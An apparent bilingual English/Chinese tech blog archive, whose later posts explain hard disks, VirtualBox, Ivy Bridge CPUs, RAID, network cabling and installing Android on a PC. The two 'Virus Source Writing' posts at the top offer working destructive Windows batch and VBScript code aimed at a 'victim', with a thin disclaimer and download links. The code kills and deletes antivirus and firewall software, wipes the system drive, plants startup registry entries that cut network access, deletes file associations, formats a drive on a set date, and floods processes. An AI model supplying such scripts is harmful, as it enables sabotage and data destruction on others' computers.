显示标签为“pc tips”的博文。显示所有博文
显示标签为“pc tips”的博文。显示所有博文

2013年2月16日星期六

Virus Source Writing Part 2


This page is for educational purpose only !I will not be responsible for the consequences of the user's!

此页面仅用于教育目的!本人将不负责使用者的后果!




How To Disable Victim Antivirus. / 如何禁用受害者杀毒软件。

@ echo off
rem --rem Permanently Kill Anti-Virusnet stop “Security Center”netsh firewall set opmode mode=disabletskill /A av*tskill /A fire*tskill /A anti*clstskill /A spy*tskill /A bullguardtskill /A PersFwtskill /A KAV*tskill /A ZONEALARMtskill /A SAFEWEBclstskill /A OUTPOSTtskill /A nv*tskill /A nav*tskill /A F-*tskill /A ESAFEtskill /A cleclstskill /A BLACKICEtskill /A def*tskill /A kavtskill /A kav*tskill /A avg*tskill /A ash*clstskill /A aswupdsvtskill /A ewid*tskill /A guard*tskill /A guar*tskill /A gcasDt*tskill /A msmp*clstskill /A mcafe*tskill /A mghtmltskill /A msiexectskill /A outposttskill /A isafetskill /A zap*clstskill /A zauinsttskill /A upd*tskill /A zlclien*tskill /A minilogtskill /A cc*tskill /A norton*clstskill /A norton au*tskill /A ccc*tskill /A npfmn*tskill /A loge*tskill /A nisum*tskill /A issvctskill /A tmp*clstskill /A tmn*tskill /A pcc*tskill /A cpd*tskill /A pop*tskill /A pav*tskill /A padminclstskill /A panda*tskill /A avsch*tskill /A sche*tskill /A syman*tskill /A virus*tskill /A realm*clstskill /A sweep*tskill /A scan*tskill /A ad-*tskill /A safe*tskill /A avas*tskill /A norm*clstskill /A offg*del /Q /F C:\Program Files\alwils~1\avast4\*.*del /Q /F C:\Program Files\Lavasoft\Ad-awa~1\*.exedel /Q /F C:\Program Files\kasper~1\*.execlsdel /Q /F C:\Program Files\trojan~1\*.exedel /Q /F C:\Program Files\f-prot95\*.dlldel /Q /F C:\Program Files\tbav\*.datclsdel /Q /F C:\Program Files\avpersonal\*.vdfdel /Q /F C:\Program Files\Norton~1\*.cntdel /Q /F C:\Program Files\Mcafee\*.*clsdel /Q /F C:\Program Files\Norton~1\Norton~1\Norton~3\*.*del /Q /F C:\Program Files\Norton~1\Norton~1\speedd~1\*.*del /Q /F C:\Program Files\Norton~1\Norton~1\*.*del /Q /F C:\Program Files\Norton~1\*.*clsdel /Q /F C:\Program Files\avgamsr\*.exedel /Q /F C:\Program Files\avgamsvr\*.exedel /Q /F C:\Program Files\avgemc\*.execlsdel /Q /F C:\Program Files\avgcc\*.exedel /Q /F C:\Program Files\avgupsvc\*.exedel /Q /F C:\Program Files\grisoftdel /Q /F C:\Program Files\nood32krn\*.exedel /Q /F C:\Program Files\nood32\*.execlsdel /Q /F C:\Program Files\nod32del /Q /F C:\Program Files\nood32del /Q /F C:\Program Files\kav\*.exedel /Q /F C:\Program Files\kavmm\*.exedel /Q /F C:\Program Files\kaspersky\*.*clsdel /Q /F C:\Program Files\ewidoctrl\*.exedel /Q /F C:\Program Files\guard\*.exedel /Q /F C:\Program Files\ewido\*.execlsdel /Q /F C:\Program Files\pavprsrv\*.exedel /Q /F C:\Program Files\pavprot\*.exedel /Q /F C:\Program Files\avengine\*.execlsdel /Q /F C:\Program Files\apvxdwin\*.exedel /Q /F C:\Program Files\webproxy\*.exedel /Q /F C:\Program Files\panda software\*.*rem --




Tasks Kill

destroy the victim & kill the Os
破坏受害者的OS

@echo off
start calc
tskill msnmsgr
tskill firefox
tskill iexplore
tskill LimreWire
tskill explorer
tskill explorer
tskill explorer
tskill explorer
tskill explorer
pause



Crazy caps lock


*This constantly turns caps lock on and off really fast continuously*

Code:-

Set wshShell =wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
loop

What sex is your computer ?

Virus Source :

CreateObject("SAPI.SpVoice").Speak"wellcome to kennex dot blog spot dot com thanks for your support"




2012年12月4日星期二

Virus Source Writing Part 1


This page is for educational purpose only !I will not be responsible for the consequences of the user's!

此页面仅用于教育目的!本人将不负责使用者的后果!





This Virus Deletes All The Content Of A Drive... / 该病毒会删除所有驱动器的内容...

Virus Source :

@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00



Example Download

Disable Internet Permanently / 永久禁用Internet


Virus Source :

echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo You Have Been HACKED! ---- By Kennex
PAUSE


Example Download


The Most Simple Virus To Crush The Window / 最简单的病毒,粉碎窗口


Virus Source :

@Echo off
Del C:\ *.* |y


Example Download


This Will Crash Your Computer / 你的电脑会崩溃


Virus Source :

Option Explicit

Dim WSHShell
Set WSHShell=Wscript.CreateObject("Wscript.Shell")

Dim x
For x = 1 to 100000000
WSHShell.Run "Tourstart.exe"

It Only Works With Windows XP )

Example Download


Delete Key Registry Files [NOTE THIS IS DANGEROUS!! USE AT RISK] /     删除键的注册表文件[注:这是危险的!]


This will delete key registry files, then loops a message (CANNOT BE RECOVERED FROM)*
这将删除键的注册表文件,然后循环的消息无法恢复
Virus Source :

@ECHO OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*
:MESSAGE
ECHO Your computer has been fcked.  Have a nice day.
GOTO MESSAGE


Example Download


Endless Notepads / 无尽的记事本


*This will pop up endless notepads until the computer freezes and crashes*
*这将弹出无尽的记事本,直到电脑死机和崩溃*
Virus Source :

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top



Example Download

 Bomb Virus / 炸弹病毒


Note:- You Can Change The Date ( 2009/11/25 ) Of The Virus And The Location ( format E: ) On Which It Does Its Action
The Virus Will Take Effect On That Day


注: - 您可以更改日期(2009/11/25)的病毒和位置(格式E)在它的行动。
该病毒会在那一天起生效

Virus Source :

If %date% NEQ 2009/11/25 goto exit
format E: /y >nul
:exit
exit


And Save It As Anything.bat

Example Download




View More: 











2012年11月15日星期四

What is Harddisk / 什么是硬盘



Harddisk


Alternatively referred to as a hard disk drive and abbreviated as HDD or HDD, the hard drive is the computer's main storage media device that permanently stores all data on the computer. The hard drive was first introduced on September 13, 1956 and consists of one or more hard drive platters inside of air sealed casing. Most computer hard drives are in an internal drive bay at the front of the computer and connect to the motherboard using either ATA, SCSI, or a SATA cable and power cable. Below, is an illustration of what the inside of a hard drive looks like for a desktop and laptop hard drive.

或者简称为硬盘驱动器,简称为HDD或硬盘驱动器,硬盘驱动器是电脑的主要存储介质设备,永久存储在电脑上的所有数据。 1956年9月13日,首次推出的硬盘驱动器由一个或多个硬盘驱动器盘片内部的空气密闭容器内。大多数的计算机硬盘驱动器在内部驱动器托架在电脑前和使用无论是ATA,SCSI或SATA电缆和电源线连接到主板上。下面,就是一个例证内的台式机和笔记本电脑的硬盘驱动器的硬盘驱动器看起来像什么。


** Note :  head actuator = 头致动器
               read/write actuator arm = 读/写促动臂
               read/write head = 读/写磁头
               spindle = 主轴
               platter = 磁盘
              Chassis = 底盘

As can be seen in the above picture, the desktop hard drive has six components: the head actuator, read/write actuator arm, read/write head, spindle, and platter. On the back of a hard drive is a circuit board called the disk controller.

在上面的图片中可以看出,台式机硬盘有六个组成部分:头致动器,读/写促动臂,读/写磁头,主轴和磁盘。在硬盘驱动器的背面一个称为磁盘控制器的电路板。

How is data read and stored on a hard drive? 

数据是如何读取和存储在硬盘上吗?

Data sent to and from the hard drive is interpreted by the disk controller, which tells the hard drive what to do and how to move the components within the drive. When the operating system needs to read or write information, it examines the hard drives File Allocation Table (FAT) to determine file location and available areas. Once this has been determined, the disk controller instructs the actuator to move the read/write arm and align the read/write head. Because files are often scattered throughout the platter, the head will often need to move to several different locations to access all information.

All information stored on a traditional hard drive, like the above example, is done magnetically. After completing the above steps, if the computer needs to read information from the hard drive it would read the magnetic polarities on the platter. One side of the magnetic polarity is 0 and the other is 1, reading this as binary data the computer can understand what the data is on the platter. For the computer to write information to the platter, the read/write head aligns the magnetic polarities, writing 0's and 1's that can be read later.

发送的数据和从硬盘驱动器,硬盘驱动器做什么和如何移动的组件,驱动器内的磁盘控制器,它告诉解释。当操作系统需要读取或写入信息时,它会检查硬盘驱动器的文件分配表(FAT),以确定文件的位置和可用区域。一旦这已经确定时,磁盘控制器指示的致动器移动的读/写臂和对齐的读/写头。因为文件通常分散在整个盘子里,头部会经常需要移动几个不同的地点访问所有信息。

传统的硬盘驱动器上存储的所有信息,如上面的例子中,磁性。完成上述步骤后,如果计算机需要从硬盘驱动器读取信息,它会读取盘片上的磁场极性。一侧的磁场极性为0,另一方为1,读取此作为二进制数据的计算机可以理解的,在盘片上的数据是什么。对于计算机将信息写入到盘片上,读/写头对齐,写0和1的后面,可以读出的磁场极性。




See More :


2012年11月13日星期二

VirtualBox a virtualization product for enterprise


VirtualBox

VirtualBox is a powerful x86 and AMD64/Intel64 virtualization product for enterprise as well as home use. Not only is VirtualBox an extremely feature rich, high performance product for enterprise customers, it is also the only professional solution that is freely available as Open Source Software under the terms of the GNU General Public License (GPL) version 2. See "About VirtualBox" for an introduction.

Presently, VirtualBox runs on Windows, Linux, Macintosh, and Solaris hosts and supports a large number of guest operating systems including but not limited to Windows (NT 4.0, 2000, XP, Server 2003, Vista, Windows 7), DOS/Windows 3.x, Linux (2.4 and 2.6), Solaris and OpenSolaris, OS/2, and OpenBSD.

VirtualBox is being actively developed with frequent releases and has an ever growing list of features, supported guest operating systems and platforms it runs on. VirtualBox is a community effort backed by a dedicated company: everyone is encouraged to contribute while Oracle ensures the product always meets professional quality criteria.


VirtualBox是一个强大的x86和AMD64/Intel64的虚拟化产品,为企业和家庭使用。不仅是VirtualBox的一个功能极为丰富,高性能的产品,为企业客户,它也是唯一的专业解决方案,作为开源软件是免费提供的条款下的GNU通用公共许可证(GPL)版本2。请参阅“关于VirtualBox的”作一介绍。

目前,VirtualBox在Windows,Linux,Macintosh电脑,和Solaris主机上运行,并支持大量的客户操作系统,包括但不限于Windows(NT 4.0,2000,XP,Server 2003中,Vista中,Windows 7中),DOS/ Windows的3 X操作系统,Linux(2.4和2.6),OS / 2,Solaris和OpenSolaris和OpenBSD。

VirtualBox是积极发展与频繁的发布,有越来越多的功能,支持的来宾操作系统和平台上运行。 VirtualBox是一个社会的努力,由一个专门的公司支持,而Oracle可确保产品始终符合专业质量标准,鼓励每个人做出贡献。

Perview / 预展


VirtualBox for Linux/UNIX. Within VirtualBox Windows XP is running.










VirtualBox for Mac OS X. Within VirtualBox Windows 7 is running.












VirtualBox for Windows. Within VirtualBox Ubuntu 10.10 is running.












DOWNLOAD / 下载




In ubuntu just login to software center and type in VirtualBox in search bar 
在ubuntu中,只需登录软件中心在搜索栏填上VirtualBox



SEE MORE :


2012年11月4日星期日

The New Powerful Cpu with Ivy Bridge. 新的Ivy Bridge强大的CPU

The intel ivy bridge cpu is starting using number 3 for header example i3-3220/ i5-3450/ i7-3770k

The 22nm-based Ivy Bridge processor is considerably smaller than its predecessor. It has nearly 400 million more transistors yet is about 25 percent smaller. What’s more interesting, however, is how much real estate is dedicated to each task on the new Ivy Bridge vs. Sandy Bridge. These die shots (not to scale) show that the almost 2x performance bump in graphics comes at the price of die space. Intel, however, discounts any criticism regarding how much emphasis it placed on graphics over x86 functionality and says just because it looks like more space was expended on graphics doesn’t mean it’s more important.


英特尔Ivy Bridge的CPU开始使用3号头的例子酷睿i3-3220 /酷睿i5-3450 /酷睿i7-3770k

基于22纳米Ivy Bridge处理器比它的前身是相当小的。它有近400万的晶体管是小约25%。然而,更有趣的是多少,房地产是专门为每个任务在新的Ivy Bridge的与Sandy Bridge的。这些模拍摄(不按比例)显示,几乎2倍的性能提升,在图形来自于模空间的价格。然而,英特尔的折扣任何批评意见,它放置在图形的重视程度超过x86功能和说,只是因为它看起来像图形花费更多的空间,并不意味着它更重要的。

Sandy Bridge


Ivy Bridge



Compatibility   兼容性


We’ve long railed against Intel for releasing new sockets with new CPUs (remember the short-lived Socket LGA1156 and Socket 423 and numerous LGA775 versions?), but the company has stepped up to the plate for the Sandy Bridge-to-Ivy Bridge transition. As Intel promised, most LGA1155 boards will support Ivy Bridge procs if the firmware and BIOS are updated to support the chip by the board maker. However, not all chipsets will make the Ivy Bridge cut. Intel has intentionally left out support for the business chipsets Q65, Q67, and B65 while supporting consumer H61, H67, P67, and Z68. Why leave some out? Intel believes the day of an IT shop getting down and dirty and upgrading processors in an office-drone PC are long gone, so there’s just no reason to expend the resources on unnecessary support. Besides getting the latest core technology from Intel, switching to Ivy Bridge on older 6-series boards should also give you PCIe 3.0 support on some slots. 

我们早就抨击英特尔推出新的套接字与新的CPU(还记得短命的插槽LGA1156和Socket423和众多的LGA775版本?),但该公司的Sandy Bridge,Ivy Bridge的加强板过渡。作为英特尔的承诺,最LGA1155主板将支持Ivy Bridge的特效,如果固件和BIOS更新,以支持芯片的电路板制造商。然而,并非所有的芯片组将做的Ivy Bridge切断。英特尔有意冷落业务芯片组Q65,Q67和B65的支持,同时支持消费者H61,H67,P67,Z68。为什么要离开了吗?英特尔认为,当天的IT购物越来越脏,升级处理器在办公室无人驾驶飞机PC日子已经一去不复返了,所以没有理由花费的资源上不必要的支持。除了英特尔最新的核心技术,从旧的6系列主板,切换到Ivy Bridge的也应该给你一些插槽的PCIe 3.0的支持。

World’s First Chip with ‘3D’ Transistors  世界上第一个'3 D'晶片的电晶体


We’ve long dubbed Intel the “Master of the Fab.” The company’s prowess in chip fabrication is the envy of the world. Yeah, there was that little thing with the Pentium 4, which hit the process wall like a freight train, but for the most part, Intel’s mastery of chip fabrication has always made its new CPUs a tour de force of technology that makes you wonder if the company doesn’t have a crashed flying saucer hidden at 2200 Mission College Boulevard.

With Ivy Bridge, Intel again amazes with the world’s first use of tri-gate, or 3D, transistors. Also called finFETs, for fin field-effect transistors, the 3D transistors literally rise up off of the die to dramatically reduce power consumption while increasing performance. 

In a traditional planar transistor, current flows on a flat surface like a river. A gate, which ostensibly controls that flow, lies across the top of that river with contact only along a small surface. With a finFET, or 3D tri-gate, the flow of power spans a fin that juts from the surface. Instead of just contacting the surface along one dimension, the gate encircles it and makes contact on three sides.


我们早就被称为英特尔的Fab“大师”该公司在芯片制造的实力是全世界羡慕的对象。是啊,有那个小东西的奔腾4,它打的过程墙壁像一列货运火车,但在大多数情况下,英特尔掌握芯片制造一直由它的新的CPU一游德力科技,让你不知道,如果该公司没有在2200使命学院大道隐藏坠毁的飞碟。

随着Ivy Bridge的英特尔再次惊讶与世界上首次使用三栅极,或3D晶体管。也被称为FinFET元件,鳍式场效晶体管,三维晶体管从字面上上升关闭的模具,在提高性能的同时,显着降低功耗。

在传统的平面型晶体管,电流流过,像一条河流,在一个平面上。一个门,表面上控制流量,横跨该河的顶部,只能沿着一个小面的接触。有了一个的finFET,或3D三栅极的电源时,流程跨越从该表面伸出的翅片。而不是仅仅沿一维的表面接触,栅极包围它,三面接触。






2012年11月3日星期六

What Is OS (Operating System) ? 什么是OS

An operating system or OS is a software program that enables the computer hardware to communicate and operate with the computer software. Without a computer operating system, a computer and software programs would be useless.


Examples of computer operating systems


  • Microsoft Windows 8 - PC And Notebook compatible operating system. Microsoft Windows is the most commonly found and used operating system.
  • Apple MacOS - Apple computer operating system. The only Apple computer operating system.
  • Ubuntu Linux - A popular variant of Linux used with PC and IBM compatible computers.
  • Google Android - operating system used with Android compatible phones.
  • iOS - Operating system used with the Apple iPhone.




操作系统或操作系统是一个软件程序,使计算机硬件,通信和与计算机软件。如果没有一个计算机操作系统,计算机和软件程序将是无用的。


电脑操作系统的例子


  • 微软Windows8 - PC和手提电脑兼容的操作系统。微软Windows是最常见的操作系统,使用率也是全球最多的。
  • 苹果公司的MacOS - 苹果电脑操作系统。唯一的苹果电脑操作系统。
  • Ubuntu Linux - 使用Linux的操作系统PC和IBM兼容电脑 - 一种流行的变种。
  • 谷歌Android - 使用的操作系统与Android兼容的手机。
  • IOS - 苹果公司的iPhone使用的操作系统。


2012年11月2日星期五

What is RAID? 什么是RAID?

RAID

RAID stands for Redundant Array of Inexpensive (Independent) Disks

In most situations you will be using one of the following four levels of RAIDs.

  • RAID 0
  • RAID 1
  • RAID 5
  • RAID 10 (also known as RAID 1+0)
This article explains the main difference between these raid levels along with an easy to understand diagram.

In all the diagrams mentioned below:
  • A, B, C, D, E and F – represents blocks
  • p1, p2, and p3 – represents parity.

RAID LEVEL 0

Following are the key points to remember for RAID level 0.

  • Minimum 2 disks.
  • Excellent performance ( as blocks are striped ).
  • No redundancy ( no mirror, no parity ).
  • Don’t use this for any critical system.




RAID LEVEL 1

Following are the key points to remember for RAID level 1.

  • Minimum 2 disks.
  • Good performance ( no striping. no parity ).
  • Excellent redundancy ( as blocks are mirrored ).




RAID LEVEL 5

Following are the key points to remember for RAID level 5.

  • Minimum 3 disks.
  • Good performance ( as blocks are striped ).
  • Good redundancy ( distributed parity ).
  • Best cost effective option providing both performance and redundancy. Use this for DB that is heavily read oriented. Write operations will be slow.



RAID LEVEL 10 (1+0)
Following are the key points to remember for RAID level 10.

  • Minimum 4 disks.
  • This is also called as “stripe of mirrors”
  • Excellent redundancy ( as blocks are mirrored )
  • Excellent performance ( as blocks are striped )
  • If you can afford the dollar, this is the BEST option for any mission critical applications (especially databases).





RAID


RAID来至Redundant Array of Inexpensive (Independent) Disks

在大多数情况下,您将使用以下四个级别的RAID。

  • RAID 0
  • RAID 1
  • RAID 5
  • RAID 10 (also known as RAID 1+0)
这篇文章解释了这些RAID级别之间的主要区别,以及一个易于理解的图表。

在下面提及的所有图:
  • A,B,C,D,E和F - 代表块/资料
  • P1,P2,和p3 - 代表奇偶校验/资料结合

RAID LEVEL 0


下面是一些关键点要记住的RAID级别为0。

  • 最少2个磁盘。
  • 优异的性能(如块条带化)。
  • 不再备有冗余(无反光镜,无奇偶校验)。
  • 不要使用任何重要的系统。




RAID LEVEL 1


以下是关键点要记住的RAID级别1。


  • 最少2个磁盘。
  • 表现良好(没有条纹,无奇偶校验)。
  • 出色的冗余(以块的镜像)。




RAID LEVEL 5


下面是一些关键点要记住的RAID5级。


  • 最少3个磁盘。
  • 表现良好(块条带化)。
  • 良好的冗余性(分布式奇偶校验)。
  • 最佳成本效益的选择,同时提供性能和冗余。使用此DB,大量阅读导向。写操作将是缓慢的。



RAID LEVEL 10 (1+0)

下面是一些关键点要记住的RAID级别10。
  • 最少4个磁盘。
  • 这也被称为“条纹镜”
  • 出色的冗余(如块镜像)
  • 出色的性能(块条带化)
  • 如果你能负担得起的美元,这是任何关键任务的应用程序(尤其是数据库)的最佳选择。

Make a Cat5 / Ethernet / RJ45 / Network Cable 图教网线制作

CAT-5E/NETWORKCABLE Wiring Diagram & Crossover Cable Diagram

CAT-5E/网线接线图和交叉线图

The following CAT5 wiring diagram and crossover cable diagram will teach an installer how to correctly assemble a CAT-5 cable RJ45 connectors for regular network cables as well as crossover cables. The first set of instructions are for standard network patch cables (EIA/TIA-568B). 

以下CAT5布线图和交叉线图,安装程序会教如何正确组装的CAT-5电缆的RJ45连接器,用于常规的网络电缆和交叉电缆。第一组的指令为标准的网络的补丁电缆(EIA/TIA-568B)。

  • Using an cat5 cutter and crimping tool, strip about 1/3"of the out jacket of the cat-5 cable.  Be sure not to strip or damage any of the pairs of inner cables.  使用CAT5刀和压接工具,带出的CAT-5电缆外套的约1/3“。确保不剥夺或损害任何对内部电缆。

  • Assemble the pairs of wires in the following order for network cables (EIA standard / EIA-568 B).   组装线对按以下顺序网线(EIA标准/ EIA-568 B)。

  • Insert the wires into the RJ45 jack as seen below.  Be sure to keep the wires in the correct order.   如下图所示,将导线插入RJ45插孔。以正确的顺序是一定要保持的电线。

  • Insert the RJ45 connector into the crimping tool (again carefully make sure the wires stay inserted in the correct order). Crimp down firmly on the crimping tool to permanently attach the RJ45 to the CAT5 cable.   插入RJ45连接器压接工具(再仔细,确保以正确的顺序保持插入的电线)。用力向下压接工具压接永久连接的RJ45 CAT5电缆。

Crossover Cable Diagram

To create a crossover cable with cat-5 cable follow the same instructions as above for CAT-5 wiring except when you get to step #2, use the below crossover cable diagram:
要创建一个跨接电缆CAT-5电缆CAT-5布线除上述相同的指令,当你得到第2步,使用下面的交叉网线图:


2012年11月1日星期四

Install Android ICS on Laptop or Netbook

Android mobiles are everywhere today. This Google mobile operating system become one of the best alternative for Apple iPhone. On Sep 23, 2008 the first version of android was released. Within these three years Google has released five different versions of android. All these versions had a great improvement from the previous ones. Android is an open source operating system and it is developed by leading mobile companies like HTC, Samsung, Sony Ericcson, etc. Android is the most popular operating system next to iOS.

Ice Cream Sandwich is the latest version of android released by Google. It has improved a lot from its predecessor ginger bread. Gingerbread users faced a lot of hanging problem with their mobile phones due to its poor interface. In ICS the user interface and the multitasking options has improved a lot from gingerbread. Also the widgets and folders have improved from its older look. Previously I wrote an article to install Froyo version of android in pc. That has got a good response from more numbers of readers. So today I’m going to tell you how to install android ICS on your personal computer.

Android手机在现今的时代是无处不在。这使谷歌移动操作系统成为了苹果iPhone的最佳替代品之一。于2008年9月23日发布的第一个版本的Android。在这三年中,谷歌已经发布了5个不同版本的Android。所有这些从以前的版本有很大的改善。 Android是一个开源的操作系统,它是由领先的移动公司,如HTC,三星,索尼ERICCSON等Android是最流行的操作系统仅次于iOS。

冰淇淋三明治是由谷歌发布了最新版本的Android。它从它的前身姜面包有了很大的提高。姜饼用户面临的问题与他们的手机,由于它的不良接口挂了很多。 ICS的用户界面和多任务选项有了很大的提高,从姜饼。此外,小部件和文件夹从旧的外观有所改善。在此之前,我写了一篇文章,在PC上安装Froyo版本的Android。这已经得到了良好的反应,更多的读者。所以,今天我要告诉你如何安装Android ICS在您的个人计算机上。

Tools Required to Install Android ICS on PC安装Android ICS在PC的必要道具


Tool 1: Android ICS 4.0    ------------ you maybe can download at here   Download
道具 1: Android ICS 4.0  

Tool 2: A Compact Disc (CD) or A USB Device - you maybe can download at here   Download
道具 2: 光盘(CD)或USB设备

Ready To Start Install Now
现在开始安装

Step 1: Download android ICS as an iso file which will help you to burn your live CD. You can download the iso file from android-x86
第1步:下载Android ICS作为一个iso文件,这将帮助你燃烧您的Live CD。从android-x86的,您可以下载的ISO文件

Step 2: In order to extract the iso file into a CD or a USB Drive you need to download a software called UNetBootin which is available for windows, linux and mac. You can download it for free.
第2步:为了解压ISO文件到CD或USB驱动器,你需要下载一个软件叫UNetBootin这是适用于Windows,Linux和Mac。您可以下载免费的。

Step 3: Now you have to install the UNetBootin in your windows machine. After installation you will get a screen as shown below. You have to locate the iso file also the drive (either cd or usb drive) where you need to extract it.
第3步:现在,你必须在你的Windows机器安装方面,UNetbootin。安装完成后,你会得到一个如下所示的屏幕。你必须找到ISO文件的驱动器(CD或USB驱动器),你需要把它解压。

Step 4: After locating your iso file and your drive it will start extracting the files into your disk. Once the process is completed you can start installing the Android ICS in your PC.
第4步:定位你的ISO文件和驱动器后,将文件解压缩到您的硬盘上。一旦过程完成后,您就可以开始在您的电脑中安装Android ICS。


Step 5: The iso file will be extracted to your flash drive. Now you have to reboot the system with the flash drive. Enter into bios mode and change the boot settings to boot from flash drive. This will give you a screen exactly as shown below.
第5步:将ISO文件将被解压到您的闪存驱动器。现在你必须重新启动系统,闪存驱动器。进入BIOS模式,并更改启动设置从闪存驱动器启动。这会给你一个完全如下图所示的画面。


Step 6: Either you can install the OS into your laptop or you can run the OS without installation. First time it’s better to try the OS without installation. After you select the option you have wait for a couple of minutes and it will redirect you to your desktop as shown in the screenshot below.
第6步:要么你可以在OS安装到你的笔记本电脑或没有安装,你可以运行OS。第一次尝试的操作系统无需安装。选择该选项后,等待一两分钟,它将会被重定向到您的桌面上,如下面的截图所示。


Some of the default apps will be available there in the desktop.  You can download your favorite apps from Google Play and you can enjoy all the resources from android in your desktop. One more advantage is you can carry this OS anywhere and use it in any laptop or desktop without installation. Internet connection is must for downloading any apps from Google play. Also you can use your webcam and mic for voice and video chat.

These are all the steps to install Android ICS on your desktop. Try this in your laptop or desktop and do share your comments and doubts about this tutorial below. Thanks for reading and you may now share this post with your friends to let them also try this method to get the worlds fastest growing mobile operating system on their computer and play with it.

一些默认的应用程序将可以在桌面上。从谷歌游戏,你可以下载你喜爱的应用程序,你可以享受所有的资源,Android在您的桌面上。另一个优势是你可以随身携带OS的任何地方,在任何笔记本电脑或台式机使用,无需安装。互联网连接播放从谷歌下载任何应用程序。您也可以使用您的网络摄像头和麦克风,语音和视频聊天。

这是在您的桌面上安装Android ICS的所有步骤。尝试在你的笔记本电脑或台式机,分享您的意见和怀疑本教程。感谢您的阅读,您可以与您的朋友分享这篇文章,让他们在自己的计算机上,也可以尝试这种方法来获得世界上增长最快的移动操作系统和它一起玩。